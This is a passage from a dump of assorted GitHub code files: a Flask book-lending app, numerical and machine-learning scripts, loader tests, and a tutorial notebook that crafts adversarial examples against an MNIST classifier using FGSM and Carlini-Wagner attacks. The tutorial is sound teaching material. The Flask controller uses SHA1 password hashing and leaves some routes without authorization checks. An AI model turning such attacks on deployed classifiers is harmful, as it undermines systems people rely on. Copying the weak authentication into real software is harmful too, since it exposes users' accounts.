'':\n\t\tcurrent_user.email = form.email.data\n\t\tsession[\"email\"] = current_user.email\n\t\tuser_save = True\n\tif form.password and form.password.data != '':\t\n\t\tcurrent_user.password = hashlib.sha1(form.password.data+salt).hexdigest() \n\t\tuser_save = True\n\tif user_save:\n\t\tmodel.session.add(current_user)\n\t\tmodel.session.commit()\n \n\tflash(\"You have successfully updated your account, \" + current_user.given_name + \".\")\n\treturn redirect(\"/index\")\n\t\t\n@app.route(\"/amazon/search\", methods=[\"GET\", \"POST\"])\ndef amazon_search():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tif session['admin']:\n\t\tform = AmazonSearch()\n\t\tif form.validate_on_submit():\n\t\t\tbooks = get_book_by_title_author(form.title.data, form.author.data)\n\t\t\t#get_book_by_title_author is defined in search_amazon\n\t\t\treturn render_template(\"amazon_results.html\", amazon_res=books, user=user)\n\t\telse:\n\t\t\treturn render_template(\"amazon_search.html\", form=form, user=user)\n\telse:\n\t\treturn \"You are not authorized to do this.\"\n\n@app.route(\"/amazon/add_book\", methods=[\"GET\"])\ndef add_book():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tasin = request.args.get(\"asin\")\n\ttitle = unicode(request.args.get(\"title\"))\n\tauthor = unicode(request.args.get(\"author\"))\n\tamazon_url = request.args.get(\"amazon_url\")\n\tgenre, description, image = get_book_info(asin)\n\tbook = model.Book(title=title,\n\t author=author,\n\t genre=genre,\n\t description=description,\n\t image_url=image,\n\t amazon_url=amazon_url,\n\t asin=asin)\n\tbook_exist = model.session.query(model.Book).filter_by(title=title).all()\n\tform = AmazonSearch()\n\t# if book is already in the database, return to amazon_search\n\tif book_exist:\t\n\t \tflash(\"Book is already in the database.\")\n\t \treturn render_template(\"amazon_search.html\", form=form, user=user)\n\tmodel.session.add(book)\n\tmodel.session.commit()\n\treturn render_template(\"view_added_book.html\", book=book, user=user)\n\n@app.route(\"/book/search\", methods=[\"GET\", \"POST\"])\ndef book_search_form():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tform = BookSearch()\n\ttitle = request.form.get(\"title\")\n\tauthor = request.form.get(\"author\")\n\t\n\tif form.validate_on_submit():\n\t\tbooks_query = model.session.query(model.Book)\n\t\t\n\t\tif title:\n\t\t\tbooks = books_query.filter(model.Book.title.ilike(\"%\"+title+\"%\")).all()\n\n\t\telif author:\n\t\t\tbooks = books_query.filter(model.Book.author.ilike(\"%\"+author+\"%\")).all()\n\t\t\n\t\telif title and author:\n\t\t\tbooks = books_query.filter(model.Book.author.ilike(\"%\"+author+\"%\"), \n\t\t\t\t model.Book.title.ilike(\"%\"+title+\"%\")).all()\n\n\t\tif not books:\n\t\t\tflash(\"No books were found matching your search terms.\")\n\t\t\treturn render_template(\"book_search.html\", form=form, user=user)\n\t\treturn render_template(\"book_results.html\", book_results=books, user=user)\n\treturn render_template(\"book_search.html\", form=form, user=user)\n\n@app.route(\"/book/\", methods=[\"GET\"])\ndef view_book(id):\n\tbook = model.session.query(model.Book).get(id)\n\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\tstatus = book.get_status()\n\treturn render_template(\"view_book.html\", book=book, status=status, user=user) \n\n@app.route(\"/book//request\", methods=[\"GET\"])\ndef book_request(id):\t\n\tif session[\"email\"]:\n\t\tbook = model.session.query(model.Book).get(id)\n\t\trequester = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\t\tnew_request = model.BookStatus(book_id=book.id, requester_id=requester.id)\n\t\tmodel.session.add(new_request)\n\t\tmodel.session.commit()\n\t\tflash (\"You have requested to borrow this book.\")\n\t\t#Send Twilio message when someone requests to borrow a book\n\t\tmessage = client.messages.create(body=\"Kristin, \" + requester.given_name + \n\t\t\t \" \" + requester.surname + \n\t\t\t \" has requested to borrow the book: \" \n\t\t\t + book.title + \".\",\n\t\t\t to=my_phone, \n\t\t\t from_=twilio_phone)\t\t\t\n\treturn redirect(url_for(\"view_book\", id=id)) \n\n@app.route(\"/book//update_status\", methods=[\"GET\"])\ndef book_update_status(id):\t\n\tif session['admin']:\n\t\tbook = model.session.query(model.Book).get(id)\n\t\trequester = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\t\tstatus = model.session.query(model.BookStatus).filter_by(book_id=book.id, checked_in=None).all()\n\t\t#Checks in specific book if it shows as either requested or checked-out. \n\t\tfor s in status:\n\t\t\tif s.checked_in == None:\n\t\t\t\ts.checked_in = datetime.now()\t\t\n\t\tmodel.session.commit()\n\treturn redirect(url_for(\"view_book\", id=id))\n\n\n\n\n\n\t\t\n\n\n","repo_name":"kfran99/Library-of-Kristin","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9261765429","text":"# 岭回归\r\nfrom sklearn.datasets import load_boston #sklearn波士顿房价预测数据接口\r\nfrom sklearn.model_selection import train_test_split #划分数据集\r\nfrom sklearn.preprocessing import StandardScaler #数据标准化\r\nfrom sklearn.linear_model import Ridge #预估器(正规方程)、预估器(梯度下降学习)、岭回归\r\nfrom sklearn.metrics import mean_squared_error #均方误\r\nfrom sklearn.externals import joblib #模型的加载与保存\r\ndef linear():\r\n # 1)获取数据\r\n boston = load_boston()\r\n print(\"特征数量:\\n\", boston.data.shape)\r\n # 2)划分数据集\r\n x_train, x_test, y_train, y_test = train_test_split(boston.data, boston.target, random_state=22)\r\n # 3)标准化\r\n transfer = StandardScaler()\r\n x_train = transfer.fit_transform(x_train)\r\n x_test = transfer.transform(x_test)\r\n # 4)预估器\r\n estimator = Ridge(alpha=0.5, max_iter=10000)\r\n estimator.fit(x_train, y_train)\r\n # 保存模型\r\n joblib.dump(estimator, \"my_ridge.pkl\")\r\n # 加载模型 使用时注销 4)预估器 和 保存模型\r\n # estimator = joblib.load(\"my_ridge.pkl\"\r\n # 5)得出模型\r\n print(\"岭回归-权重系数为:\\n\", estimator.coef_)\r\n print(\"岭回归-偏置为:\\n\", estimator.intercept_)\r\n # 6)模型评估\r\n y_predict = estimator.predict(x_test)\r\n error = mean_squared_error(y_test, y_predict)\r\n print(\"岭回归-均方误差为:\\n\", error)\r\n return None\r\nif __name__ == \"__main__\":\r\n linear()\r\n\r\n","repo_name":"HuichuanLI/play_with_machine_learning_book","sub_path":"一些经典的机器学习的实现/岭回归.py","file_name":"岭回归.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16157047918","text":"\"\"\" M4N9 Computational Linear Algebra - Project 2\nTudor Trita Trita\nCID: 01199397\n\nImplemented using Python 3.7 (need f-string python 3.6+)\n\nQuestion 3. Exponential Integrators\n\"\"\"\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.linalg\nimport scipy.sparse.linalg\nimport time\n\nimport question2\nimport rexi_coefficients\n\n\nclass Computations:\n \"\"\" Contains Runge Kutta 2nd Order, REXI and Direct Solution.\"\"\"\n def __init__(self, N=100, H=10):\n self.N = N\n self.H = H\n\n self.initial_condition()\n self.matrices()\n\n def initial_condition(self):\n self.dx = self.H / (self.N + 1)\n self.inv_dx = 1/self.dx\n self.inv_dx2 = self.inv_dx**2\n\n self.x = np.linspace(0, self.H, self.N, dtype=np.complex128)\n self.V0 = np.exp(-(self.x-5)**2/0.2) - np.exp(-125)\n self.W0 = np.zeros(self.N, dtype=np.complex128)\n self.U0 = np.concatenate((self.V0, self.W0))\n\n def matrices(self):\n \"\"\" Initialises the matrices L and K.\"\"\"\n # Creating L\n L = scipy.sparse.diags((self.inv_dx2, -2*self.inv_dx2, self.inv_dx2, 1),\n (-(self.N+1), -self.N, -(self.N-1), self.N),\n shape=(2*self.N, 2*self.N), dtype=np.complex128)\n self.L = scipy.sparse.csr_matrix(L)\n self.L[-(self.N+1), 0], self.L[-1, -self.N] = 0, 0\n\n # Computing largest eigenvalue of L explicitely:\n self.mu_max = self.inv_dx*np.sqrt(2*(1 + np.cos(np.pi/(self.N+1))))\n\n # Creating K\n self.K = scipy.sparse.diags((-self.inv_dx2, 2*self.inv_dx2, -self.inv_dx2),\n (-1, 0, 1), # Diagonals\n shape=(self.N, self.N), # Size of matrix\n dtype=np.complex128)\n\n def EXPM(self, T):\n U = scipy.linalg.expm(T*self.L) @ self.U0\n return U\n\n def RK2(self, T=2.5, dt=0.00001):\n \"\"\" Computes Runge Kutta 2nd Order solution of the initial condition\n at time T with steps dt.\n \"\"\"\n t_space = np.linspace(0, T, 1 + T/dt)\n U = self.U0.copy()\n half_dt_L = (dt / 2) * self.L\n dt_L = dt * self.L\n\n for i, t in enumerate(t_space[1:]):\n U_hlf = U + half_dt_L @ U\n U += dt_L @ U_hlf\n return U\n\n def REXI(self, T=2.5, h=None, M=None):\n \"\"\"REXI Exponential Integrator Solution\"\"\"\n if h:\n M = 1.1*T*self.mu_max/h\n elif M:\n h = 1.1*T*self.mu_max/M\n else:\n raise Exception(\"ERROR: At least ONE of h or M needs to be assigned!\")\n\n alpha, beta = rexi_coefficients.RexiCoefficients(h, M)\n J = alpha.shape[0]\n\n # Initialising variables V, W:\n V = np.zeros((self.N, J), dtype=np.complex128)\n W = np.zeros((self.N, J), dtype=np.complex128)\n\n # Pre-computing terms outside of the loop:\n LHS_pre = T**2 * self.K\n RHS_pre = self.W0*T\n for j in range(J):\n LHS = LHS_pre + scipy.sparse.diags([alpha[j]**2],\n offsets=0,\n shape=[self.N, self.N],\n dtype=np.complex128)\n RHS = alpha[j]*self.V0 - RHS_pre\n L, U = question2.bandedLU(LHS, 1, 1)\n RHS2 = scipy.sparse.linalg.spsolve_triangular(L, RHS, lower=True)\n # Can't use spsolve_triangular again as U isn't completely upper-triangular due to roundoff\n V[:, j] = scipy.sparse.linalg.spsolve(U, RHS2)\n W[:, j] = (self.V0 - alpha[j]*V[:, j])/T\n\n # End loop:\n Uj_mat = np.concatenate((V, W), axis=0)\n U = np.sum(np.multiply(Uj_mat, beta[None, :]), axis=1)\n return U, (h, M)\n\n def plot_solutions(self, solutions_list, plot_w=False, savefig_filename=None, display=True):\n \"\"\" Plots solutions for different times and methods.\n solutions_dict needs to be in the following format:\n [[solution1, [method1, T1]], [solution2, [method2, T2]], ...]\n Constrained to parameters the class was initialised with (N, H)\n \"\"\"\n plt.figure(figsize=(13, 8))\n for s in solutions_list:\n U = s[0]\n method, T = s[1]\n plt.plot(self.x, U[:self.N], label=rf\"$U$ : {method}, $T = {T}$\")\n if plot_w:\n plt.plot(self.x, U[self.N:], label=rf\"$U_t$ : {method}, $T = {T}$\")\n plt.xlabel(r\"$x$\")\n plt.ylabel(r\"$U, U_t$\")\n plt.title(\"Plot of Various Models at Different Times\")\n plt.legend()\n plt.grid()\n if savefig_filename:\n plt.savefig(savefig_filename) if savefig_filename.endswith(\".png\") else plt.savefig(savefig_filename+\".jpg\")\n if display:\n plt.show()\n\ndef main():\n # FIGURE 0: Showing Wave at Time 2.5 for REXI & RK2 (CAST TO REALS)\n C1 = Computations(N=100, H=10)\n U_REXI, _ = C1.REXI(T=2.5, M=50)\n U_RK2 = C1.RK2()\n C1.plot_solutions([[U_REXI, ['REXI', 2.5]],\n [U_RK2, ['RK2', 2.5]]],\n plot_w=True)\n\n # FIGURE 1: Contour plot of solution propagating through time (CAST TO REALS)\n C2 = Computations(N=100, H=10)\n times_array = np.linspace(0, 5)\n for i, T in enumerate(times_array[1:]):\n print(i)\n U_REXI, _ = C2.REXI(T=T, M=30)\n if i==0:\n U_REXI_MATRIX = np.concatenate([C2.U0[:, None], U_REXI[:, None]], axis=1)\n else:\n U_REXI_MATRIX = np.concatenate([U_REXI_MATRIX, U_REXI[:, None]], axis=1)\n\n fig1 = plt.figure(figsize=(13, 8))\n plt.contourf(C2.x, times_array, U_REXI_MATRIX[:C2.N, :].T, cmap=matplotlib.cm.jet)\n plt.colorbar()\n plt.xlabel(\"X Interval [0, H]\")\n plt.ylabel(\"Time T\")\n title1 = \"Figure 1 - Countour plot of REXI Solution at Various Times\"\n plt.title(title1)\n plt.savefig(title1+\".png\")\n plt.show()\n\n # FIGURE 2: Computing convergence between RK2 and REXI FOR varying M, dt:\n C3 = Computations(N=10, H=10)\n U_RK2_1 = C3.RK2(T=2.5, dt=pow(10, -4))\n U_RK2_2 = C3.RK2(T=2.5, dt=pow(10, -5))\n U_RK2_3 = C3.RK2(T=2.5, dt=pow(10, -6))\n\n norms1, norms2, norms3 = [], [], []\n range_M = np.linspace(10, 300, 30, dtype=int)\n for M in range_M:\n U_REXI, _ = C3.REXI(M=M)\n norm1 = np.linalg.norm(U_RK2_1 - U_REXI)\n norm2 = np.linalg.norm(U_RK2_2 - U_REXI)\n norm3 = np.linalg.norm(U_RK2_3 - U_REXI)\n\n norms1.append(norm1)\n norms2.append(norm2)\n norms3.append(norm3)\n\n fig2 = plt.figure(figsize=(13, 8))\n plt.semilogy(range_M, norms1, 'r--', label=rf\"$\\Delta t$={pow(10, -4)}\")\n plt.semilogy(range_M, norms2, 'b', label=rf\"$\\Delta t$={pow(10, -5)}\")\n plt.semilogy(range_M, norms3, 'k', label=rf\"$\\Delta t$={pow(10, -6)}\")\n\n plt.xlabel('M')\n plt.ylabel(\"Difference in Norms\")\n title2 = \"Figure 2 - Plot of in Convergence for U_RK2 & U_REXI, varying M and dt (T=2.5)\"\n plt.title(title2, fontsize=15)\n plt.legend()\n plt.grid()\n plt.savefig(title2+\".png\")\n plt.show()\n\n # FIGURE 3: Dependence of M, H for different M, N\n C4 = Computations(N=5)\n C5 = Computations(N=10)\n C6 = Computations(N=15)\n\n range_M = np.linspace(10, 300, 30, dtype=int)\n h1_array, h2_array, h3_array = [], [], []\n for M in range_M:\n U_REXI1, [h1, M] = C4.REXI(M=M)\n U_REXI2, [h2, M] = C5.REXI(M=M)\n U_REXI3, [h3, M] = C6.REXI(M=M)\n h1_array.append(h1)\n h2_array.append(h2)\n h3_array.append(h3)\n\n fig3 = plt.figure(figsize=(13, 8))\n plt.plot(range_M, h1_array, 'r--', label=\"REXI N=5\")\n plt.plot(range_M, h2_array, 'b', label=\"REXI N=10\")\n plt.plot(range_M, h3_array, 'k', label=\"REXI N=15\")\n\n plt.xlabel('M')\n plt.ylabel('h')\n title3 = \"Figure 3 - Plotting dependencies of h and M for different N\"\n plt.title(title3, fontsize=15)\n plt.legend()\n plt.grid()\n plt.savefig(title3+\".png\")\n plt.show()\n return\n\nif __name__ == \"__main__\":\n print(\"Program Started\")\n print()\n main()\n print()\n print(\"Program Finished\")\n","repo_name":"tudortrita/M4N9-Computational-Linear-Algebra","sub_path":"cw2/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33066546561","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,../scripts/modeling//py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.13.7\n# kernelspec:\n# display_name: Python 3.8.0 ('fraud-class')\n# language: python\n# name: python380jvsc74a57bd03cd04a71416ab130df52c6ad253f6c01cfe1f5da6ec3d93fcc0cee3c0dbab0b4\n# ---\n\n# +\nimport numpy as np \nimport pandas as pd \nimport datasist as ds\nimport datasist.project as dp\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import cross_val_score, train_test_split\n# -\n\n#retrieve data from the processed folder\ntrain = dp.get_data(\"train_proc.csv\", method='csv')\ntest = dp.get_data(\"test_proc.csv\", method='csv')\nlabels = dp.get_data(\"train_labels.csv\", method='csv')\n\n# +\nX_train, X_test, y_train, y_test = train_test_split(train, labels, test_size=0.3, random_state=2)\n\nrf_model = RandomForestClassifier(n_estimators=100,random_state=232)\nlg_model = LogisticRegression(max_iter=100, random_state=2, solver='lbfgs')\n\n# +\nlg_model.fit(X_train, y_train)\npred = lg_model.predict(X_test)\n\n#Get report from true and predicted values\nds.model.get_classification_report(y_test, pred)\n\n\n# -\n\ndef get_classification_report(y_train=None, prediction=None, show_roc_plot=True, save_plot=False):\n '''\n Generates performance report for a classification problem.\n\n Parameters:\n ------------------\n y_train: Array, series, list.\n\n The truth/ground value from the train data set.\n \n prediction: Array, series, list.\n\n The predicted value by a trained model.\n\n show_roc_plot: Bool, default True.\n\n Show the model ROC curve.\n\n save_plot: Bool, default True.\n\n Save the plot to the current working directory.\n\n '''\n acc = accuracy_score(y_train, prediction)\n f1 = f1_score(y_train, prediction)\n precision = precision_score(y_train, prediction)\n recall = recall_score(y_train, prediction)\n confusion_mat = confusion_matrix(y_train, prediction)\n\n print(\"Accuracy is \", round(acc * 100))\n print(\"F1 score is \", round(f1 * 100))\n print(\"Precision is \", round(precision * 100))\n print(\"Recall is \", round(recall * 100))\n print(\"*\" * 100)\n print(\"confusion Matrix\")\n print(' Score positive Score negative')\n print('Actual positive %6d' % confusion_mat[0,0] + ' %5d' % confusion_mat[0,1])\n print('Actual negative %6d' % confusion_mat[1,0] + ' %5d' % confusion_mat[1,1])\n print('')\n\n if show_roc_plot: \n plot_auc(y_train, prediction)\n\n if save_plot:\n plt.savefig(\"roc_plot.png\")\n\n\n# +\nrf_model.fit(X_train, y_train)\npred = rf_model.predict(X_test)\n\n#Get report from true and predicted values\nds.model.get_classification_report(y_test, pred)\n# -\n\nds.model.train_classifier(X_train=train, y_train=labels, estimator=rf_model,\n cross_validate=True, cv=5)\n\nfeats = train.columns\n\n\n\n\ndef plot_feature_importance(estimator=None, col_names=None):\n '''\n Plots the feature importance from a trained scikit learn estimator\n as a bar chart.\n\n Parameters:\n -----------\n estimator: scikit learn estimator.\n\n Model that has been fit and contains the feature_importance_ attribute.\n\n col_names: list\n\n The names of the columns. Must map unto feature importance array.\n\n Returns:\n --------\n Matplotlib figure showing feature importances\n '''\n if estimator is None:\n raise ValueError(\"estimator: Expecting an estimator that implements the fit api, got None\")\n if col_names is None:\n raise ValueError(\"col_names: Expecting a list of column names, got 'None'\")\n \n if len(col_names) != len(estimator.feature_importances_):\n raise ValueError(\"col_names: Lenght of col_names must match lenght of feature importances\")\n\n imps = estimator.feature_importances_\n feats_imp = pd.DataFrame({\"features\": col_names, \"importance\": imps}).sort_values(by='importance', ascending=False)\n sns.barplot(x='features', y='importance', data=feats_imp)\n plt.xticks(rotation=90)\n plt.title(\"Feature importance plot\")\n plt.show()\n\n\nplot_feature_importance(estimator=rf_model, col_names=feats)\n\ndp.save_model(rf_model, name='rf_model_n10')\n\n\n# pickling the model\nimport pickle\npickle_out = open(\"../../outputs/models/rf_model.pkl\", \"wb\")\npickle.dump(rf_model, pickle_out)\npickle_out.close()","repo_name":"Danselem/fraud-classifier","sub_path":"fraud-class/src/scripts/modeling/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17012836381","text":"#!/usr/bin/env python3\n\"\"\"\n\n\"\"\"\n##-- imports\nfrom __future__ import annotations\n\nimport logging as logmod\nimport unittest\nimport warnings\nimport pathlib as pl\nfrom typing import (Any, Callable, ClassVar, Generic, Iterable, Iterator,\n Mapping, Match, MutableMapping, Sequence, Tuple, TypeAlias,\n TypeVar, cast)\nfrom unittest import mock\n##-- end imports\n\nimport pytest\nimport tomler\nimport doot\nfrom importlib.metadata import EntryPoint\ndoot.config = tomler.Tomler({})\nfrom doot.loaders import cmd_loader\nlogging = logmod.root\n\nclass TestCmdLoader(unittest.TestCase):\n\n def test_initial(self):\n basic = cmd_loader.DootCommandLoader()\n assert(basic is not None)\n\n def test_load_basic(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"list\", group=\"doot.command\", value=\"doot.cmds.list_cmd:ListCmd\")\n\n ]}))\n result = basic.load()\n assert(\"list\" in result)\n\n def test_load_multi(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"list\", group=\"doot.command\", value=\"doot.cmds.list_cmd:ListCmd\"),\n EntryPoint(name=\"run\", group=\"doot.command\", value=\"doot.cmds.run_cmd:RunCmd\"),\n\n ]}))\n result = basic.load()\n assert(\"list\" in result)\n assert(\"run\" in result)\n\n def test_load_fail(self):\n basic = cmd_loader.DootCommandLoader()\n basic.setup(tomler.Tomler({\n \"command\" : [\n EntryPoint(name=\"bad\", group=\"doot.command\", value=\"doot.cmds.bad:badcmd\"),\n\n ]}))\n with pytest.raises(doot.errors.DootPluginError):\n basic.load()\n","repo_name":"jgrey4296/doot","sub_path":"doot/loaders/__tests/test_cmd_loader.py","file_name":"test_cmd_loader.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17251789034","text":"\n# coding: utf-8\n\n# # Attacking a CNN\n# \n# In this exercise we will train a CNN to distinguish between handwritten `0` and `1`. We will be using `keras` to do this. \n# \n# Once we have a trained classifier we will be using `cleverhans` to create adversarial examples\n\n# In[ ]:\n\n\nimport warnings\nimport numpy as np\nimport os\nwith warnings.catch_warnings():\n import keras # keras is still using some deprectade code\nfrom keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense\nfrom cleverhans.utils_keras import KerasModelWrapper\nfrom cleverhans.attacks import BasicIterativeMethod, FastGradientMethod, CarliniWagnerL2\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\n# The MNIST dataset contains data for all the digits. We are only interesstend in the 1s and 0s though. therefore we are extracting those from the dataset. \n# \n# We also need to normalize the data. This means that what ever intervall the input values have been in willbe squashed to `[0,1]`\n\n# In[ ]:\n\n\ndef exract_ones_and_zeroes( data, labels ):\n # data_zeroes = data[ np.argwhere( labels == 0 ) ]\n # data_ones = data[ np.argwhere( labels == 1 ) ]\n data_zeroes = data[ np.argwhere( labels == 0 ).reshape( -1 ) ][ :200 ]\n print( data_zeroes.shape )\n data_ones = data[ np.argwhere( labels == 1 ).reshape( -1 ) ][ :200 ]\n x = np.vstack( (data_zeroes, data_ones) )\n\n # normalize the data\n x = x / 255.\n\n labels_zeroes = np.zeros( data_zeroes.shape[ 0 ] )\n labels_ones = np.ones( data_ones.shape[ 0 ] )\n y = np.append( labels_zeroes, labels_ones )\n\n return x, y\n\n\n# Load the actuall data and us our preprocessing function from earlier\n\n# In[ ]:\n\n\nmnist_file = os.path.join( 'data', 'mnist', 'mnist.npz' )\n\n# load the data\nf = np.load( mnist_file )\nx_train, y_train = f[ 'x_train' ], f[ 'y_train' ]\nprint( 'x_train', x_train.shape )\nprint( 'y_train', y_train.shape )\n\nx_test, y_test = f[ 'x_test' ], f[ 'y_test' ]\nprint( 'x_test', x_test.shape )\nprint( 'y_test', y_test.shape )\nf.close( )\n\n# extract ones and zeroes\nx_train, y_train = exract_ones_and_zeroes( x_train, y_train )\nx_test, y_test = exract_ones_and_zeroes( x_test, y_test )\n\n\n# We need to do some more data preprocessing so keras will be happy.\n\n# In[ ]:\n\n\n# we need to bring the data in to a format that our cnn likes\ny_train = keras.utils.to_categorical( y_train, 2 )\ny_test = keras.utils.to_categorical( y_test, 2 )\n\nif keras.backend.image_data_format( ) == 'channels_first':\n x_train = x_train.reshape( x_train.shape[ 0 ], 1, x_train.shape[ 1 ], x_train.shape[ 2 ] )\n x_test = x_test.reshape( x_test.shape[ 0 ], 1, x_train.shape[ 1 ], x_train.shape[ 2 ] )\n input_shape = (1, x_train.shape[ 1 ], x_train.shape[ 2 ])\nelse:\n x_train = x_train.reshape( x_train.shape[ 0 ], x_train.shape[ 1 ], x_train.shape[ 2 ], 1 )\n x_test = x_test.reshape( x_test.shape[ 0 ], x_train.shape[ 1 ], x_train.shape[ 2 ], 1 )\n input_shape = (x_train.shape[ 1 ], x_train.shape[ 2 ], 1)\n\n\n\n# We need to make sure that `cleverhans` has access to our model graph. To do this we make sure that `keras` uses the same `tensorflow` session that `cleverhans` will be using. \n\n# In[ ]:\n\n\n# need to some setup so everything gets excecuted in the same tensorflow session\nsession = tf.Session( )\nkeras.backend.set_session( session )\n\n\n# We are using a very simple CNN. For our two output classes this probably overkill. This network can be used to distinguish between all 10 classes with very high accuracy.\n\n# In[ ]:\n\n\n# define the classifier\nclf = keras.Sequential( )\nclf.add( Conv2D( 32, kernel_size=(3, 3), activation='relu', input_shape=input_shape ) )\nclf.add( Conv2D( 64, (3, 3), activation='relu' ) )\nclf.add( MaxPooling2D( pool_size=(2, 2) ) )\nclf.add( Dropout( 0.25 ) )\nclf.add( Flatten( ) )\nclf.add( Dense( 128, activation='relu' ) )\nclf.add( Dropout( 0.5 ) )\nclf.add( Dense( 2, activation='softmax' ) )\n\nclf.compile( loss=keras.losses.categorical_crossentropy,\n optimizer='adam',\n metrics=[ 'accuracy' ] )\n\nclf.fit( x_train, y_train,\n epochs=2,\n verbose=1 )\n#clf.summary( )\nscore = clf.evaluate( x_test, y_test, verbose=0 )\nprint( 'Test loss:', score[ 0 ] )\nprint( 'Test accuracy:', score[ 1 ] )\n\n\n# Let's get to the actuall attack magic. First we are picking sample that we want to pertubate. After we using the FGSM attack the the Carlini & Wagner L2 attack to pertubate it into and adversarial example.\n\n# In[ ]:\n\n\n#chose a sample to pertubate\nsample_ind = 100\n\n# picking a test sample\nsample = x_test[ sample_ind, : ]\n\n\n# plot the first instance in the traning set\nplt.imshow( sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n# constructing adversarial examples\nprint( 'class prediction for the test samples:',\n clf.predict( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\n# setup the attack\nwrapper = KerasModelWrapper( clf )\nfgm = FastGradientMethod( wrapper, sess=session )\neps = 0.3 # allowed maximum modification\n\n# excetute the attack\nwith warnings.catch_warnings():\n modified_sample = fgm.generate_np( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ),\n **{ 'eps': eps } )\n\nprint( 'class prediction for the modified test samples:',\n clf.predict( modified_sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\nplt.imshow( modified_sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n# let's try a stronger attack\nwith warnings.catch_warnings():\n cw_l2 = CarliniWagnerL2( wrapper, sess=session )\n modified_sample = cw_l2.generate_np( sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ),\n **{ 'eps': eps } )\n\nprint( 'class prediction for the cw modified test samples:',\n clf.predict( modified_sample.reshape( (1, sample.shape[ 0 ], sample.shape[ 1 ], sample.shape[ 2 ]) ) ) )\nplt.imshow( modified_sample.reshape( 28, 28 ), cmap=\"gray_r\" )\nplt.axis( 'off' )\nplt.show( )\n\n","repo_name":"podschwadt/aml_tutorial","sub_path":"attacks_cnn.py","file_name":"attacks_cnn.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45262377098","text":"\"\"\"\r\nCreated on Mon Jun 20 13:30:21 2022\r\n\r\n@author: Agustina Ravettino\r\n\"\"\"\r\n\r\ndef pandas_function(results_file_name) :\r\n \"\"\"Loads a file into a pandas dataframe and calculates and prints out the\r\n 1. average file size\r\n 2. the biggest file\r\n 3. the smallest file\r\n 4. histogram plot of file sizes\r\n param results_file_name: str results file name.\r\n return: result: json with results. \r\n \"\"\"\r\n import pandas as pd\r\n import json\r\n import numpy as np\r\n\r\n #Set dataframe columns\r\n colnames=['file_name','size_in_bytes']\r\n #Read file\r\n data=pd.read_csv(results_file_name,names=colnames, header=None,delim_whitespace=True)\r\n #Do calculations\r\n average= data.size_in_bytes.mean()\r\n #Generates mask for biggest and smallest files to allocate those file names\r\n mask_biggest= data.size_in_bytes ==data.size_in_bytes.max()\r\n biggest_ind=data[mask_biggest].index.values\r\n biggests=data.file_name[biggest_ind].values\r\n mask_smallest= data.size_in_bytes ==data.size_in_bytes.min()\r\n smallest_ind=data[mask_smallest].index.values\r\n smallests=data.file_name[smallest_ind].values\r\n #Generate a simple histogram plot\r\n ax = data.plot.hist(bins=10, alpha=0.8)\r\n\r\n #Print out results\r\n print( \"The average file size in bytes is: \", round(average,2), \r\n \"\\nThe biggest file/s is/are: \", biggests, \r\n \"\\nThe smallest file/s is/are: \", smallests\r\n ) \r\n biggests_str= np.array2string(biggests, precision=2, separator=',',\r\n suppress_small=True)\r\n smallests_str= np.array2string(smallests, precision=2, separator=',',\r\n suppress_small=True)\r\n result = {\r\n \"AverageFileSizeInBytes\": average,\r\n \"Biggest(s)File(s)\": biggests_str,\r\n \"Smallest(s)File(s)\": smallests_str\r\n }\r\n \r\n result = json.dumps(result)\r\n\r\n return result\r\n\r\n\r\ndef unzip_file(directory):\r\n \"\"\"function to unzip file\"\"\"\r\n with ZipFile(directory, 'r') as zipObj:\r\n # Extract all the contents of zip file in current directory\r\n 